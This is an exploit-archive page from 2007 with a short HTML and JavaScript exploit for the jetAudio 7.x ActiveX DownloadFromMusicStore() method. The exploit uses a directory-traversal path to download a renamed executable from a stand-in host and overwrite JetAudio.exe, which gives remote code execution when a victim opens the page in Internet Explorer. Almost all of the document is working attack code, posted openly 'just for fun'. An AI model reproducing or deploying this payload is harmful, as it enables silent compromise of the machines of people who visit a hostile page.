Home / exploits jetaudio-exec.txt
Posted on 20 September 2007
<HTML> <!-- jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> Tested on:.. - jetAudio 7.0.3 Basic - Microsoft Internet Explorer 6 Just for fun ;) --> <object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object> <script> var target = "DownloadFromMusicStore"; //>rename evil.exe evil.mp3 var url = "http://192.168.0.1/evil.mp3"; var dst = "..\..\..\..\..\..\..\..\Program Files\JetAudio\JetAudio.exe"; var title = "0day"; var artist = "h07"; var album = "for fun"; var genere = "exploit"; var size = 256; var param1 = 0; var param2 = 0; obj[target](url, dst, title, artist, album, genere, size, param1, param2); </script> </HTML>